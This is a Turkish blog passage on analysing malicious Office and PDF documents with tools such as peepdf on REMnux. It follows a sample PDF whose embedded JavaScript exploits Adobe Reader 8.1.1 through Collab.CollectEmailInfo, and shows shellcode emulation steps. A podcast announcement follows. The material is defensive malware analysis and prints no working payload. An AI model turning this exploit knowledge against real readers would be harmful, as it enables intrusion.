Zararlı doküman analizinde analiz edilecek dosya Microsoft ofis dokümanı ise amaç, zararlı kod içerebilecek VB makro kodu, OLE verisi, kabuk kodu, PE dosyasını tespit etmektir. Bunun için OfficeMalScanner ve OffVis araçlarından faydalanabilirsiniz.

Eğer analiz edilecek dosya PDF ise bu defa amaç, zararlı kod içerebilecek Javascript kodunu tespit etmektir. Bunun için de pdf-parser.py, peepdf ve Origami gibi araçlardan faydalanabilirsiniz.

Örnek olarak malware.pdf adında zararlı kod içeren bir pdf dosyasını analiz etmek istersek yapacağımız ilk iş ayrı ayrı bu iş için tasarlanmış araçları indirmek yerine zararlı yazılım analizi gerçekleştirmek için özel olarak hazırlanmış ve bir çok aracı üzerinde barındıran REMnux sanal işletim sistemini indirip kullanmaktır.

Kullanmaya başladığım bu işletim sisteminde, masaüstüne kopyaladığımız malware.pdf dosyasını peepdf aracı ile analiz etmek için peepdf.py -i malware.pdf komutunu yazarak bu pdf dosyası üzerinde javascript kodu olup olmadığını kontrol edebiliriz.

Görüldüğü üzere peepdf aracı bize 4. objede (Object with JS code) javascript kodu olduğu bilgisini vermektedir. js_beautify object 4 komutunu yazarak pdf dosyası içinde yer alan javascript kodunu düzgün bir biçimde görüntüleyebiliriz.

Analiz neticesinde oluşturulan kabuk kodununun (shellcode) Collab.CollectEmailInfo fonksiyonuna gönderiliyor olması sonucunda bu pdf dosyasının içinde 2008 yılından kalma Adobe PDF v8.1.1 ve önceki sürümlerinde bulunan zafiyeti istismar eden istismar kodunun (exploit) bulunduğunu öğrenmiş oluyoruz.

Kimi zaman bu örnekte olduğu gibi pdf dosyası içinde yer alan istismar kodunun hangi zafiyeti istismar ettiğini anlamak bu kadar kolay olmayabilir. Bu gibi durumlarda javascript kodu içinde yer alan kabuk kodunu set shellcode “kabuk kodu” komutu ile tanımladıktan sonra js_unescape variable shellcode komutu ile analiz edilebilir hale getirebilir, sctest variable shellcode komutu ile kabuk kodunun çalışmasını simüle edebilir, shellcode2exe aracı ile yürütülebilir programa (executable) çevirerek immunity debugger ile dinamik olarak analiz edebilirsiniz.

Bir sonraki yazıda görüşmek dileğiyle yeni yılın herkese güvenli günler dilerim.

Güvenlik Sohbetleri

M.S — Fri, 06 Jan 2012 19:35:51 +0000

Uzun zamandan beri güvenlik dünyasından arkadaşlarla ayda bir defa bir araya gelerek güvenlik dünyasında olan bitenler üzerine keyifli sohbetler gerçekleştiriyorduk. En son buluşmamızda ise bu sohbeti kayıt altına almaya ve sizlerle paylaşmaya karar verdik. Umarım dinlerken en az sizler de bizler kadar keyif alırsınız.

Olumlu/olumsuz, düşüncelerinizi, görüşlerinizi ve önerilerinizi bizlerle paylaşabilirseniz bundan sonra gerçekleştireceğimiz tüm sohbetlerimizi aynı şekilde kayıt altına alıyor ve sizlerle paylaşıyor oluruz, herkese keyifli dinletiler dileriz.

Güvenlik Sohbetleri Bölüm 1
Tarih: 4 Ocak 2012 Çarşamba
Konu: 2011 yılında güvenlik dünyasında kısaca olup bitenler.
Katılımcılar: Mert SARICA, Sertan KOLAT, Ömer ALBAYRAK
Dinle:

Dilerseniz ses dosyasını buradan indirebilirsiniz.

——————————————–

Güvenlik Sohbetleri Bölüm 2
Tarih: 21 Mart 2012 Çarşamba
Konu: Mobil Platformlarda Zararlı Yazılımlar Üzerine.
Katılımcılar: Mert SARICA, Sertan KOLAT, Ömer ALBAYRAK, Özgür ERDOĞAN
Dinle:

Dilerseniz ses dosyasını buradan indirebilirsiniz.